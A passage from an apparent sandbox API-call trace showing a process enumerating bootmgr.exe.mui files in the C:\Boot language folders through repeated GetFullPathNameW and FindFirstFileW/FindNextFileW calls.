out: lpBuffer="C:\\Boot\\pt-BR\\", lpFilePart=0x0) returned 0xe [0039.389] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.403] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.403] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.403] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.403] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.403] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.403] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR", lpFilePart=0x0) returned 0xd [0039.403] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-BR\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-BR\\", lpFilePart=0x0) returned 0xe [0039.403] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-BR\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.403] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.403] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.404] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.404] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.404] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0039.404] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.404] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.404] CoTaskMemFree (pv=0x4fe370) [0039.404] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.404] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0039.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.404] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0039.404] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\", lpFilePart=0x0) returned 0xe [0039.404] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.404] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.405] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.405] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.405] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.405] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.405] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT", lpFilePart=0x0) returned 0xd [0039.405] GetFullPathNameW (in: lpFileName="C:\\Boot\\pt-PT\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\pt-PT\\", lpFilePart=0x0) returned 0xe [0039.405] FindFirstFileW (in: lpFileName="C:\\Boot\\pt-PT\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.405] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.405] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.405] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe823ce95, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.405] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.405] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0039.406] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.406] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.406] CoTaskMemFree (pv=0x4fe370) [0039.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.406] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0039.406] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.406] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0039.406] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\", lpFilePart=0x0) returned 0xe [0039.406] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.439] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.440] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.440] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.440] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.440] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.440] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.440] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU", lpFilePart=0x0) returned 0xd [0039.440] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\", lpFilePart=0x0) returned 0xe [0039.440] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.440] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.440] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.440] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.440] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.440] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.440] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\.", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0039.441] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0039.441] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0039.441] CoTaskMemFree (pv=0x4fe370) [0039.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x2aed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0039.441] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x2aedb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0039.441] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.441] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0039.441] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\", lpFilePart=0x0) returned 0xe [0039.441] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.441] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.441] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.441] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0039.441] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0039.441] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af23c) returned 1 [0039.442] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af248) returned 1 [0039.442] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x2aed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0039.442] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af27c) returned 1 [0039.442] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x2aed84, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0039.442] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\", nBufferLength=0x105, lpBuffer=0x2aed58, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\", lpFilePart=0x0) returned 0xe [0039.442] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x2aefa4 | out: lpFindFileData=0x2aefa4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0039.442] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.442] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aefb4 | out: lpFindFileData=0x2aefb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", 